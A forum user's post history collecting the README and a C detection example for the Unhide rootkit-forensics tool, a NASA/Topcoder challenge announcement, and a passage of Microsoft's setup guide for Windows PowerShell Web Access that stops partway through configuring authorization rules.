Everything posted by Fi8sVrs
-
Unhide is a forensic tool to find hidden processes and TCP/UDP ports that are hidden via rootkits, LKMs, or other techniques.

Linux

README:

**-Unhide-**
http://www.unhide-forensics.info

Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hiding technique.

// Unhide (unhide-linux or unhide-posix)
// -------------------------------------

Detecting hidden processes. Implements six main techniques

1- Compare /proc vs /bin/ps output

2- Compare info gathered from /bin/ps with info gathered by walking through the procfs. ONLY for unhide-linux version

3- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning).

4- Full PIDs space occupation (PIDs bruteforcing). ONLY for unhide-linux version

5- Compare /bin/ps output vs /proc, procfs walking and syscall. ONLY for unhide-linux version
   Reverse search, verify that all threads seen by ps are also seen in the kernel.

6- Quick compare /proc, procfs walking and syscall vs /bin/ps output. ONLY for unhide-linux version
   It's about 20 times faster than tests 1+2+3 but may give more false positives.

// Unhide_rb
// ---------

It's a back port in C language of the ruby unhide.rb
As the original unhide.rb, it is roughly equivalent to "unhide-linux quick reverse" :
- it makes three tests less (kill, opendir and chdir),
- it only runs /bin/ps once at start and once for the double check,
- also, its tests are less accurate (e.g. testing return value instead of errno),
- processes are only identified by their exe link (unhide-linux also uses cmdline and "sleeping kernel process" name),
- there's little protection against failures (failed fopen or popen for example),
- there's no logging capability.
It is very quick, about 80 times quicker than "unhide-linux quick reverse"

// Unhide-TCP
// ----------

Identify TCP/UDP ports that are listening but not listed in sbin/ss or /bin/netstat.
It uses two methods:
- brute force of all TCP/UDP ports available and compare with SS/netstat output.
- probe of all TCP/UDP ports not reported by netstat.

// Files
// -----

unhide-linux.c -- Hidden processes, for Linux >= 2.6
unhide-linux.h

unhide-tcp.c -- Hidden TCP/UDP Ports
unhide-tcp-fast.c
unhide-tcp.h

unhide-output.c -- Common routines of unhide tools
unhide-output.h

unhide_rb.c -- C port of unhide.rb (a very light version of unhide-linux in ruby)

unhide-posix.c -- Hidden processes, for generic Unix systems (*BSD, Solaris, linux 2.2 / 2.4)
                  It doesn't implement PIDs brute forcing check yet. Needs more testing
                  Warning : This version is somewhat outdated and may generate false positive.
                  Prefer unhide-linux.c if you can use it.

changelog -- As the name implies, log of the changes to unhide

COPYING -- License file, GNU GPL V3

LEEME.txt -- Spanish version of this file

LISEZ-MOI.TXT -- French version of this file

NEWS -- Release notes

README.txt -- This file

sanity.sh -- unhide-linux testsuite file

TODO -- Evolutions to do (any volunteers ?)

man/unhide.8 -- English man page of unhide
man/unhide-tcp.8 -- English man page of unhide-tcp

man/fr/unhide.8 -- French man page of unhide
man/fr/unhide-tcp.8 -- French man page of unhide-tcp

// Compiling
// ---------

If you ARE using a Linux kernel >= 2.6

    gcc -Wall -O2 --static -pthread unhide-linux*.c unhide-output.c -o unhide-linux
    gcc -Wall -O2 --static unhide_rb.c -o unhide_rb
    gcc -Wall -O2 --static unhide-tcp.c unhide-tcp-fast.c unhide-output.c -o unhide-tcp
    ln -s unhide unhide-linux

Else (Linux < 2.6, *BSD, Solaris and other Unices)

    gcc --static unhide-posix.c -o unhide-posix
    ln -s unhide unhide-posix

// Using
// -----

You MUST be root to use unhide-linux and unhide-tcp.

Examples:

    # ./unhide-linux -vo quick reverse
    # ./unhide-linux -vom procall sys
    # ./unhide_rb

    # ./unhide-tcp -flov
    # ./unhide-tcp -flovs

// License
// -------

GPL V.3 (http://www.gnu.org/licenses/gpl-3.0.html)

// Greets
// ------

A. Ramos (aramosf@unsec.net) for some regexps
unspawn (unspawn@rootshell.be) CentOS support
Martin Bowers (Martin.Bowers@freescale.com) CentOS support
Lorenzo Martinez (lorenzo@lorenzomartinez.homeip.net) Some ideas to improve and betatesting
Francois Marier (francois@debian.org) Author of the man pages and Debian support
Johan Walles (johan.walles@gmail.com) Find and fix a very nasty race condition bug
Jan Iven (jan.iven@cern.ch) Because of his great improvements, new tests and bugfixing
P. Gouin (patrick-g@users.sourceforge.net) Because of his incredible work fixing bugs and improving the performance
François Boisson for his idea of a double check in brute test
Leandro Lucarella (leandro.lucarella@sociomantic.com) for the fast scan method and his factorization work for unhide-tcp

Download Linux

2012-12-29

Windows:

// WinUnhide
Compare info gathered from wmic command with info gathered from openprocess and Toolhelp

// WinUnhide-TCP
First it lists open TCP/UDP ports through GetTcpTable and GetUdpTable and then identifies hidden ports using bind() bruteforcing

Download Windows

Authored by YJesus | Site unhide-forensics.info

http://packetstormsecurity.com/files/119776/Unhide-Forensic-Tool-20121229.html
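The comparison behind the README's syscall-scanning and quick tests, as an added example that is not Unhide's code and not part of the original post: every ID that answers kill(), getpgid() or getpriority() must also appear in the /proc directory listing (used here as a stand-in for /bin/ps output, which is built from /proc), and hits are re-tested against a second snapshot as in the README's double check. The function names and the MAX_PID bound are assumptions of this example.

```c
/* Added example, not Unhide's source: kernel (syscall) view vs. /proc listing. */
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <unistd.h>

#define MAX_PID   4194304          /* assumption: largest pid_max on 64-bit Linux */
#define MAP_BYTES (MAX_PID / 8 + 1)

static void set_listed(unsigned char *map, long id) { map[id >> 3] |= (unsigned char)(1u << (id & 7)); }
static int  is_listed(const unsigned char *map, long id) { return (map[id >> 3] >> (id & 7)) & 1; }

/* Userland view: record every numeric directory readdir() returns for /proc.
 * Returns the number of entries, or -1 if /proc cannot be opened. */
int snapshot_proc(unsigned char *map)
{
    DIR *dir = opendir("/proc");
    struct dirent *ent;
    int count = 0;
    if (dir == NULL)
        return -1;
    memset(map, 0, MAP_BYTES);
    while ((ent = readdir(dir)) != NULL) {
        char *end;
        long id = strtol(ent->d_name, &end, 10);
        if (end != ent->d_name && *end == '\0' && id > 0 && id < MAX_PID) {
            set_listed(map, id);
            count++;
        }
    }
    closedir(dir);
    return count;
}

/* Kernel view: three syscalls that take a PID. Each one counts as "seen"
 * unless it fails with ESRCH (EPERM still proves that the ID exists). */
int pid_responds(pid_t id)
{
    int seen = 0;
    errno = 0;
    if (kill(id, 0) == 0 || errno != ESRCH)
        seen++;
    errno = 0;
    if (getpgid(id) != (pid_t)-1 || errno != ESRCH)
        seen++;
    errno = 0;
    (void)getpriority(PRIO_PROCESS, (id_t)id);   /* -1 is a valid priority */
    if (errno != ESRCH)
        seen++;
    return seen;
}

/* readdir(/proc) lists only thread-group leaders, yet the syscalls above also
 * answer for thread IDs. Returns 1 when `id` is a non-leader thread. */
int is_secondary_thread(pid_t id)
{
    char path[64], line[128];
    long tgid = (long)id;
    FILE *f;
    snprintf(path, sizeof path, "/proc/%d/status", (int)id);
    if ((f = fopen(path, "r")) == NULL)
        return 0;                  /* nothing readable: treat as a process */
    while (fgets(line, sizeof line, f) != NULL)
        if (sscanf(line, "Tgid: %ld", &tgid) == 1)
            break;
    fclose(f);
    return tgid != (long)id;
}

/* Collect IDs in [lo, hi] that the kernel answers for but `map` does not list. */
size_t find_hidden(const unsigned char *map, pid_t lo, pid_t hi, pid_t *out, size_t cap)
{
    size_t n = 0;
    for (pid_t id = lo; id <= hi && n < cap; id++) {
        if (id <= 0 || id >= MAX_PID || is_listed(map, id))
            continue;
        if (pid_responds(id) == 0 || is_secondary_thread(id))
            continue;
        out[n++] = id;
    }
    return n;
}

int main(void)
{
    static unsigned char first[MAP_BYTES], second[MAP_BYTES];
    static pid_t hits[256];
    size_t n, confirmed = 0;
    if (snapshot_proc(first) < 0)
        return 2;
    n = find_hidden(first, 1, MAX_PID - 1, hits, 256);
    if (snapshot_proc(second) < 0)   /* double check: drop processes that */
        return 2;                    /* simply started after the first pass */
    for (size_t i = 0; i < n; i++)
        if (!is_listed(second, hits[i]) && pid_responds(hits[i]) > 0) {
            printf("ID %d answers syscalls but is not listed in /proc\n", (int)hits[i]);
            confirmed++;
        }
    return confirmed ? 1 : 0;
}
```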
-
NASA is hosting an out of this world Open Innovation Algorithm challenge! Think you've got the "right stuff"? Want to help power the International Space Station with YOUR innovative algorithmic solution? Watch the video and join this amazing competition that has a total prize purse of $30,000 today!!! https://www.topcoder.com/iss/challenge-details/
-
Updated: November 9, 2012

Applies To: Windows Server 2012

Windows PowerShell® Web Access is a new feature in Windows Server® 2012 that acts as a Windows PowerShell gateway, providing a web-based Windows PowerShell console that is targeted at a remote computer. It enables IT Pros to run Windows PowerShell commands and scripts from a Windows PowerShell console in a web browser, with no Windows PowerShell, remote management software, or browser plug-in installation necessary on the client device. All that is required to run the web-based Windows PowerShell console is a properly-configured Windows PowerShell Web Access gateway, and a client device browser that supports JavaScript® and accepts cookies.

Examples of client devices include laptops, non-work personal computers, borrowed computers, tablet computers, web kiosks, computers that are not running a Windows-based operating system, and cell phone browsers. IT Pros can perform critical management tasks on remote Windows-based servers from devices that have access to an Internet connection and a web browser.

After successful gateway setup and configuration, users can access a Windows PowerShell console by using a web browser. When users open the secured Windows PowerShell Web Access website, they can run a web-based Windows PowerShell console after successful authentication.

Windows PowerShell Web Access setup and configuration is a three-step process:

- Step 1: Installing Windows PowerShell Web Access
- Step 2: Configuring the gateway
- Step 3: Configuring authorization rules and site security

Before you install and configure Windows PowerShell Web Access, we recommend that you read both this topic and Use the Web-based Windows PowerShell Console, which describes how users sign in to the web-based console, and some of the limitations and differences in the console. End users of the web-based console should read Use the Web-based Windows PowerShell Console, but do not need to read this topic.
This topic does not provide in-depth Web Server (IIS) operations guidance; only those steps required to configure the Windows PowerShell Web Access gateway are described in this topic. For more information about configuring and securing websites in IIS, see the IIS documentation resources in the See Also section.

The following diagram shows how Windows PowerShell Web Access works.

In this topic:

- Requirements for running Windows PowerShell Web Access
- Browser and client device support
- Step 1: Installing Windows PowerShell Web Access
- Step 2: Configuring the gateway
- Step 3: Configuring authorization rules and site security
- Session management
- Use the Web-based Windows PowerShell Console
- Troubleshooting access problems
- Uninstalling Windows PowerShell Web Access

Requirements for running Windows PowerShell Web Access

Windows PowerShell Web Access requires Web Server (IIS), .NET Framework 4.5, and Windows PowerShell 3.0 to be running on the server on which you want to run the gateway.

You can install Windows PowerShell Web Access on a server that is running Windows Server 2012 by using either the Add Roles and Features Wizard in Server Manager, or Windows PowerShell deployment cmdlets for Server Manager. When you install Windows PowerShell Web Access by using Server Manager or its deployment cmdlets, required roles and features are automatically added as part of the installation process.

Windows PowerShell Web Access allows remote users to access computers in your organization by using Windows PowerShell in a web browser. Although Windows PowerShell Web Access is a convenient and powerful management tool, the web-based access poses security risks, and should be configured as securely as possible.
We recommend that administrators who configure the Windows PowerShell Web Access gateway use available security layers, both the cmdlet-based authorization rules included with Windows PowerShell Web Access, and security layers that are available in Web Server (IIS) and third-party applications. This documentation includes both unsecure examples that are only recommended for test environments, as well as examples that are recommended for secure deployments.

Browser and client device support

Windows PowerShell Web Access supports the following Internet browsers. Although mobile browsers are not officially supported, many may be able to run the web-based Windows PowerShell console. Other browsers that accept cookies, run JavaScript, and run HTTPS websites are expected to work, but are not officially tested.

Supported desktop computer browsers

- Windows® Internet Explorer® for Microsoft Windows® 8.0, 9.0, and 10.0
- Mozilla Firefox® 10.0.2
- Google Chrome™ 17.0.963.56m for Windows
- Apple Safari® 5.1.2 for Windows
- Apple Safari 5.1.2 for Mac OS®

Minimally-tested mobile devices or browsers

- Windows Phone 7 and 7.5
- Google Android WebKit 3.1 Browser Android 2.2.1 (Kernel 2.6)
- Apple Safari for iPhone operating system 5.0.1
- Apple Safari for iPad 2 operating system 5.0.1

Browser requirements

To use the Windows PowerShell Web Access web-based console, browsers must do the following.

- Allow cookies from the Windows PowerShell Web Access gateway website.
- Be able to open and read HTTPS pages.
- Open and run websites that use JavaScript.

Step 1: Installing Windows PowerShell Web Access

You can install the Windows PowerShell Web Access gateway on a server that is running Windows Server 2012 by using one of the following methods.

To install Windows PowerShell Web Access by using the Add Roles and Features Wizard

1. If Server Manager is already open, go on to the next step. If Server Manager is not already open, open it by doing one of the following.
   - On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar.
   - On the Windows Start screen, click Server Manager.

2. On the Manage menu, click Add Roles and Features.

3. On the Select installation type page, select Role-based or feature-based installation. Click Next.

4. On the Select destination server page, select a server from the server pool, or select an offline VHD. To select an offline VHD as your destination server, first select the server on which to mount the VHD, and then select the VHD file. For information about how to add servers to your server pool, see the Server Manager Help. After you have selected the destination server, click Next.

5. On the Select features page of the wizard, expand Windows PowerShell, and then select Windows PowerShell Web Access.

6. Note that you are prompted to add required features, such as .NET Framework 4.5, and role services of Web Server (IIS). Add required features and continue.

7. On the Confirm installation selections page, if the feature files for Windows PowerShell Web Access are not stored on the destination server that you selected in step 4, click Specify an alternate source path, and provide the path to the feature files. Otherwise, click Install.

8. After you click Install, the Installation progress page displays installation progress, results, and messages such as warnings, failures, or post-installation configuration steps that are required for Windows PowerShell Web Access. After Windows PowerShell Web Access is installed, you are prompted to review the readme file, which contains basic, required setup instructions for the gateway. These setup instructions (Step 2: Configuring the gateway) are also included in this document. The path to the readme file is C:\Windows\Web\PowerShellWebAccess\wwwroot\README.txt.

To install Windows PowerShell Web Access by using Windows PowerShell cmdlets

1. Do one of the following to open a Windows PowerShell session with elevated user rights.
   - On the Windows desktop, right-click Windows PowerShell on the taskbar, and then click Run as Administrator.
   - On the Windows Start screen, right-click Windows PowerShell, and then click Run as Administrator.

2. Type the following, and then press Enter, where computer_name represents a remote computer on which you want to install Windows PowerShell Web Access, if applicable. The Restart parameter automatically restarts destination servers if required.

    Install-WindowsFeature -Name WindowsPowerShellWebAccess -ComputerName <computer_name> -IncludeManagementTools -Restart

   Note: To install roles and features on an offline VHD, you must add both the ComputerName parameter and the VHD parameter. The ComputerName parameter contains the name of the server on which to mount the VHD, and the VHD parameter contains the path to the VHD file on the specified server.

    Install-WindowsFeature -Name WindowsPowerShellWebAccess -VHD <path> -ComputerName <computer_name> -IncludeManagementTools -Restart

3. When installation is complete, verify that Windows PowerShell Web Access was installed on destination servers by running the Get-WindowsFeature cmdlet on a destination server, in a Windows PowerShell console that has been opened with elevated user rights. You can also verify that Windows PowerShell Web Access was installed in the Server Manager console, by selecting a destination server on the All Servers page, and then viewing the Roles and Features tile for the selected server. You can also view the readme file for Windows PowerShell Web Access.

4. After Windows PowerShell Web Access is installed, you are prompted to review the readme file, which contains basic, required setup instructions for the gateway. These setup instructions are also in the following section, Step 2: Configuring the gateway. The path to the readme file is C:\Windows\Web\PowerShellWebAccess\wwwroot\README.txt.
Step 2: Configuring the gateway

The Install-PswaWebApplication cmdlet is a quick way to get Windows PowerShell Web Access configured. Although you can add the UseTestCertificate parameter to the Install-PswaWebApplication cmdlet to install a self-signed SSL certificate for test purposes, this is not secure; for a secure production environment, always use a valid SSL certificate that has been signed by a certification authority (CA). Administrators can replace the test certificate with a signed certificate of their choice by using the IIS Manager console.

You can complete Windows PowerShell Web Access web application configuration either by running the Install-PswaWebApplication cmdlet or by performing GUI-based configuration steps in IIS Manager. By default, the cmdlet installs the web application, pswa (and an application pool for it, pswa_pool), in the Default Web Site container, as shown in IIS Manager; if desired, you can instruct the cmdlet to change the default site container of the web application. IIS Manager offers configuration options that are available for web applications, such as changing the port number or the Secure Sockets Layer (SSL) certificate.

Configuring the gateway by using Install-PswaWebApplication

Follow these instructions to configure the Windows PowerShell Web Access gateway by using the Install-PswaWebApplication cmdlet.

To configure the Windows PowerShell Web Access gateway with a test certificate by using Install-PswaWebApplication

1. Do one of the following to open a Windows PowerShell session.

   - On the Windows desktop, right-click Windows PowerShell on the taskbar.
   - On the Windows Start screen, click Windows PowerShell.

2. Type the following, and then press Enter.

    Install-PswaWebApplication -UseTestCertificate

The following settings are configured by running the cmdlet. You can change these manually in the IIS Manager console, if desired.
   - Path: /pswa
   - ApplicationPool: pswa_pool
   - EnabledProtocols: http
   - PhysicalPath: %windir%/Web/PowerShellWebAccess/wwwroot

Example:

    Install-PswaWebApplication -webApplicationName myWebApp -useTestCertificate

In this example, the resulting website for Windows PowerShell Web Access is https://<server_name>/myWebApp.

To configure the Windows PowerShell Web Access gateway with a genuine certificate by using Install-PswaWebApplication

1. Do one of the following to open a Windows PowerShell session.

   - On the Windows desktop, right-click Windows PowerShell on the taskbar.
   - On the Windows Start screen, click Windows PowerShell.

2. Type the following, and then press Enter.

    Install-PswaWebApplication

   The following gateway settings are configured by running the cmdlet. You can change these manually in the IIS Manager console, if desired. You can also specify values for the WebsiteName and WebApplicationName parameters of the Install-PswaWebApplication cmdlet.

   - Path: /pswa
   - ApplicationPool: pswa_pool
   - EnabledProtocols: http
   - PhysicalPath: %windir%/Web/PowerShellWebAccess/wwwroot

3. Open the IIS Manager console by doing one of the following.

   - On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager.
   - On the Windows Start screen, click Server Manager.

4. In the IIS Manager tree pane, expand the node for the server on which Windows PowerShell Web Access is installed until the Sites folder is visible. Expand the Sites folder.

5. Select the website in which you have installed the Windows PowerShell Web Access web application. In the Actions pane, click Bindings.

6. In the Site Binding dialog box, click Add.

7. In the Add Site Binding dialog box, in the Type field, select https.

8. In the SSL certificate field, select your signed certificate from the drop-down menu. Click OK.
   See To configure an SSL certificate in IIS Manager in this topic for more information about how to obtain a certificate.

The Windows PowerShell Web Access web application is now configured to use your signed SSL certificate. You can access Windows PowerShell Web Access by opening https://<server_name>/pswa in a browser window.

Configuring the gateway by using IIS Manager

Instructions in this section are for installing the Windows PowerShell Web Access web application in a subdirectory—and not in the root directory—of your website. This procedure is the GUI-based equivalent of the actions performed by the Install-PswaWebApplication cmdlet. This section also includes instructions for how to use IIS Manager to configure the Windows PowerShell Web Access gateway as a root website.

To use IIS Manager to configure the gateway in an existing website

1. Open the IIS Manager console by doing one of the following.

   - On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager.
   - On the Windows Start screen, type any part of the name Internet Information Services (IIS) Manager. Click the shortcut when it is displayed in the Apps results.

2. Create a new application pool for Windows PowerShell Web Access. Expand the node of the gateway server in the IIS Manager tree pane, select Application Pools, and click Add Application Pool in the Actions pane.

3. Add a new application pool with the name pswa_pool, or provide another name. Click OK.

4. In the IIS Manager tree pane, expand the node for the server on which Windows PowerShell Web Access is installed until the Sites folder is visible. Select the Sites folder.

5. Right-click the website (for example, Default Web Site) to which you would like to add the Windows PowerShell Web Access website, and then click Add Application.

6. In the Alias field, type pswa, or provide another alias.
   The alias becomes the virtual directory name. For example, pswa in the following URL represents the alias specified in this step: https://<server_name>/pswa.

7. In the Application pool field, select the application pool that you created in step 3.

8. In the Physical path field, browse for the location of the application. You can use the default location, %windir%/Web/PowerShellWebAccess/wwwroot. Click OK.

9. Follow the steps in the procedure To configure an SSL certificate in IIS Manager in this topic.

10. Optional security step: With the website selected in the tree pane, double-click SSL Settings in the content pane. Select Require SSL, and then in the Actions pane, click Apply. Optionally, in the SSL Settings pane, you can require that users connecting to the Windows PowerShell Web Access website have client certificates. Client certificates help to verify the identity of a client device user. For more information about how requiring client certificates can increase the security of Windows PowerShell Web Access, see Security in this topic.

11. Open a browser session on a client device. For more information about supported browsers and devices, see Browser and client device support in this document.

12. Open the new Windows PowerShell Web Access website, https://<gateway_server_name>/pswa. The browser should display the Windows PowerShell Web Access console sign-in page.

13. In a Windows PowerShell session that has been opened with elevated user rights (Run as Administrator), run the following script, in which application_pool_name represents the name of the application pool that you created in step 3, to give the application pool access rights to the authorization file.
    $applicationPoolName = "<application_pool_name>"
    $authorizationFile = "C:\windows\web\powershellwebaccess\data\AuthorizationRules.xml"
    c:\windows\system32\icacls.exe $authorizationFile /grant ('"' + "IIS AppPool\$applicationPoolName" + '":R') > $null

    To view existing access rights on the authorization file, run the following command:

    c:\windows\system32\icacls.exe $authorizationFile

To use IIS Manager to configure the Windows PowerShell Web Access gateway as a root website with a test certificate

1. Open the IIS Manager console by doing one of the following.

   - On the Windows desktop, start Server Manager by clicking Server Manager in the Windows taskbar. On the Tools menu in Server Manager, click Internet Information Services (IIS) Manager.
   - On the Windows Start screen, type any part of the name Internet Information Services (IIS) Manager. Click the shortcut when it is displayed in the Apps results.

2. In the IIS Manager tree pane, expand the node for the server on which Windows PowerShell Web Access is installed until the Sites folder is visible. Select the Sites folder.

3. In the Actions pane, click Add Website.

4. Type a name for the website, such as Windows PowerShell Web Access.

5. An application pool is automatically created for the new website. To use a different application pool, click Select to select an application pool to associate with the new website. Select the alternate application pool in the Select Application Pool dialog box, and then click OK.

6. In the Physical path text box, navigate to %windir%/Web/PowerShellWebAccess/wwwroot.

7. In the Type field of the Binding area, select https.

8. Assign a port number to the website that is not already in use by another site or application. To locate open ports, you can run the netstat command in a Command Prompt window. The default port number is 443. Change the default port if another website is already using 443, or if you have other security reasons for changing the port number.
   If another website that is running on your gateway server is using your selected port, a warning is displayed when you click OK in the Add Website dialog box. You must use an unused port to run Windows PowerShell Web Access.

9. Optionally, if needed for your organization, specify a host name that makes sense to your organization and users, such as Microsoft România | Dispozitive și servicii. Click OK.

10. For a more secure production environment, we strongly recommend providing a valid certificate that has been signed by a CA. You must provide an SSL certificate, because users can only connect to Windows PowerShell Web Access through an HTTPS website. See To configure an SSL certificate in IIS Manager in this topic for more information about how to obtain a certificate.

11. Click OK to close the Add Website dialog box.

12. In a Windows PowerShell session that has been opened with elevated user rights (Run as Administrator), run the following script, in which application_pool_name represents the name of the application pool that you created in step 4, to give the application pool access rights to the authorization file.

    $applicationPoolName = "<application_pool_name>"
    $authorizationFile = "C:\windows\web\powershellwebaccess\data\AuthorizationRules.xml"
    c:\windows\system32\icacls.exe $authorizationFile /grant ('"' + "IIS AppPool\$applicationPoolName" + '":R') > $null

    To view existing access rights on the authorization file, run the following command:

    c:\windows\system32\icacls.exe $authorizationFile

13. With the new website selected in the IIS Manager tree pane, click Start in the Actions pane to start the website.

14. Open a browser session on a client device. For more information about supported browsers and devices, see Browser and client device support in this document.

15. Open the new Windows PowerShell Web Access website.
    Because the root website points to the Windows PowerShell Web Access folder, the browser should display the Windows PowerShell Web Access sign-in page when you open https://<gateway_server_name>. You should not need to add /pswa to the URL.

To configure an SSL certificate in IIS Manager

1. In the IIS Manager tree pane, select the server on which Windows PowerShell Web Access is installed.

2. In the content pane, double click Server Certificates.

3. In the Actions pane, do one of the following. For more information about configuring server certificates in IIS, see Configuring Server Certificates in IIS 7.

   - Click Import to import an existing, valid certificate from a location on your network.
   - Click Create Certificate Request to request a certificate from a CA such as VeriSign™, Thawte, or GeoTrust®. The certificate's common name must match the host header in the request. For example, if the client browser requests Microsoft România | Dispozitive și servicii, then the common name must also be Microsoft România | Dispozitive și servicii. This is the most secure and recommended option for providing the Windows PowerShell Web Access gateway with a certificate.
   - Click Create a Self-Signed Certificate to create a certificate that you can use immediately, and have signed later by a CA if desired. Specify a friendly name for the self-signed certificate, such as Windows PowerShell Web Access. This option is not considered secure, and is recommended only for a private test environment.

4. After creating or obtaining a certificate, select the website to which the certificate is applied (for example, Default Web Site) in the IIS Manager tree pane, and then click Bindings in the Actions pane.

5. In the Add Site Binding dialog box, add an https binding for the site, if one is not already displayed. If you are not using a self-signed certificate, specify the host name from step 3 of this procedure. If you are using a self-signed certificate, this step is not required.

6. Select the certificate that you obtained or created in step 3 of this procedure, and then click OK.

Step 3: Configuring authorization rules and site security

After Windows PowerShell Web Access is installed and the gateway is configured, users can open the sign-in page in a browser, but they cannot sign in until the Windows PowerShell Web Access administrator grants users access explicitly. Windows PowerShell Web Access access control is managed by using the set of Windows PowerShell cmdlets described in the following table. There is no comparable GUI for adding or managing authorization rules. For more detailed information about Windows PowerShell Web Access cmdlets, see the cmdlet Help topics linked to in the following table, or see the parent topic, Windows PowerShell Web Access Cmdlets.

Administrators can define 0-n authentication rules for Windows PowerShell Web Access. The default security is restrictive rather than permissive; zero authentication rules means no users have access to anything. Windows PowerShell Web Access authentication rules are whitelist rules. Each rule is a definition of an allowed connection between users, target computers, and particular Windows PowerShell session configurations (also referred to as endpoints or runspaces) on specified target computers.

[table=width: 650, class: grid, align: center]
[tr] [td]Name[/td] [td]Description[/td] [td]Parameters[/td] [/tr]
[tr] [td]Add-PswaAuthorizationRule[/td] [td]Adds a new authorization rule to the Windows PowerShell Web Access authorization rule set.[/td] [td]ComputerGroupName, ComputerName, ConfigurationName, RuleName, UserGroupName, UserName[/td] [/tr]
[tr] [td]Remove-PswaAuthorizationRule[/td] [td]Removes a specified authorization rule from Windows PowerShell Web Access.[/td] [td]Id, RuleName[/td] [/tr]
[tr] [td]Get-PswaAuthorizationRule[/td] [td]Returns a set of Windows PowerShell Web Access authorization rules. When it is used without parameters, the cmdlet returns all rules.[/td] [td]Id, RuleName[/td] [/tr]
[tr] [td]Test-PswaAuthorizationRule[/td] [td]Evaluates authorization rules to determine if a specific user, computer, or session configuration access request is authorized. By default, if no parameters are added, the cmdlet evaluates all authorization rules. By adding parameters, administrators can specify an authorization rule or a subset of rules to test.[/td] [td]ComputerName, ConfigurationName, RuleName, UserName[/td] [/tr]
[/table]

The preceding cmdlets create a set of access rules which are used to authorize a user on the Windows PowerShell Web Access gateway. The rules are different from the access control lists (ACLs) on the destination computer, and provide an additional layer of security for web access. More details about security are described in the following section.

If users cannot pass any of the preceding security layers, they receive a generic “access denied” message in their browser windows. Although security details are logged on the gateway server, end users are not shown information about how many security layers they passed, or at which layer the sign-in or authentication failure occurred.

For more information about configuring authorization rules, see Configuring authorization rules in this topic.

Security

The Windows PowerShell Web Access security model has four layers between an end user of the web-based console, and a target computer. Windows PowerShell Web Access administrators can add security layers through additional configuration in the IIS Manager console. For more information about securing websites in the IIS Manager console, see Configure Web Server Security (IIS 7). For more information about IIS best practices and preventing denial-of-service attacks, see Best Practices for Preventing DoS/Denial of Service Attacks. An administrator can also buy and install additional, retail authentication software.
The following table describes the four layers of security between end users and target computers.

[table=width: 700, class: grid, align: center]
[tr] [td]Order[/td] [td]Layer[/td] [td]Description[/td] [/tr]
[tr] [td]1[/td] [td]Web Server (IIS) security features, such as client certificate authentication[/td] [td]Windows PowerShell Web Access users must always provide a user name and password to authenticate their accounts on the gateway. However, Windows PowerShell Web Access administrators can also turn optional client certificate authentication on or off (see step 10 of To use IIS Manager to configure the gateway in an existing website in this document). The optional client certificate feature requires end users to have a valid client certificate, in addition to their user names and passwords, and is part of Web Server (IIS) configuration. When the client certificate layer is enabled, the Windows PowerShell Web Access sign-in page prompts users to provide valid certificates before their sign-in credentials are evaluated. Client certificate authentication automatically checks for the client certificate. If a valid certificate is not found, Windows PowerShell Web Access informs users, so they can provide the certificate. If a valid client certificate is found, Windows PowerShell Web Access opens the sign-in page for users to provide their user names and passwords. This is one example of additional security settings that are offered by Web Server (IIS). For more information about other IIS security features, see Configure Web Server Security (IIS 7).[/td] [/tr]
[tr] [td]2[/td] [td]Windows PowerShell Web Access forms-based gateway authentication[/td] [td]The Windows PowerShell Web Access sign-in page requires a set of credentials (user name and password) and offers users the option of providing different credentials for the target computer.
If the user does not provide alternate credentials, the primary user name and password that are used to connect to the gateway are also used to connect to the target computer. The required credentials are authenticated on the Windows PowerShell Web Access gateway. These credentials must be valid user accounts on either the local Windows PowerShell Web Access gateway server, or in Active Directory®. After a user is authenticated at the gateway, Windows PowerShell Web Access checks authorization rules to verify if the user has access to the requested target computer. After successful authorization, the user’s credentials are passed along to the target computer.[/td] [/tr]
[tr] [td]3[/td] [td]Windows PowerShell Web Access authorization rules[/td] [td]After a user is authenticated at the gateway, Windows PowerShell Web Access checks authorization rules to verify if the user has access to the requested target computer. After successful authorization, the user’s credentials are passed along to the target computer. These rules are evaluated only after a user has been authenticated by the gateway, and before a user can be authenticated on a target computer.[/td] [/tr]
[tr] [td]4[/td] [td]Target authentication and authorization rules[/td] [td]The final layer of security for Windows PowerShell Web Access is the target computer’s own security configuration. Users must have the appropriate access rights configured on the target computer, and also in the Windows PowerShell Web Access authorization rules, to run a Windows PowerShell web-based console that affects a target computer through Windows PowerShell Web Access. This layer offers the same security mechanisms that would evaluate connection attempts if users tried to create a remote Windows PowerShell session to a target computer from within Windows PowerShell by running the Enter-PSSession or New-PSSession cmdlets.
By default, Windows PowerShell Web Access uses the primary user name and password for authentication on both the gateway and the target computer. The web-based sign-in page, in a section titled Optional connection settings, offers users the option of providing different credentials for the target computer, if they are required. If the user does not provide alternate credentials, the primary user name and password that are used to connect to the gateway are also used to connect to the target computer. Authorization rules can be used to allow users access to a particular session configuration. You can create restricted runspaces or session configurations for Windows PowerShell Web Access, and allow specific users to connect only to specific session configurations when they sign in to Windows PowerShell Web Access. You can use access control lists (ACLs) to determine which users have access to specific endpoints, and further restrict access to the endpoint for a specific set of users by using authorization rules described in this section. For more information about restricted runspaces, see Constrained Runspaces on MSDN.[/td] [/tr]
[/table]

Configuring authorization rules

Administrators likely want the same authorization rule for Windows PowerShell Web Access users that is already defined in their environment for Windows PowerShell remote management. The first procedure in this section describes how to add a secure authorization rule that grants access to one user, signing in to manage one computer, and within a single session configuration. The second procedure describes how to remove an authorization rule that is no longer needed.

If you plan to use custom session configurations to allow specific users to work only within restricted runspaces in Windows PowerShell Web Access, create your custom session configurations before you add authorization rules that refer to them.
You cannot use the Windows PowerShell Web Access cmdlets to create custom session configurations. For more information about creating custom session configurations, see about_Session_Configuration_Files on MSDN.

Windows PowerShell Web Access cmdlets support one wildcard character, an asterisk ( * ). Wildcard characters within strings are not supported; use a single asterisk per property (users, computers, or session configurations).

To add a restrictive authorization rule

1. Do one of the following to open a Windows PowerShell session with elevated user rights.
   - On the Windows desktop, right-click Windows PowerShell on the taskbar, and then click Run as Administrator.
   - On the Windows Start screen, right-click Windows PowerShell, and then click Run as Administrator.
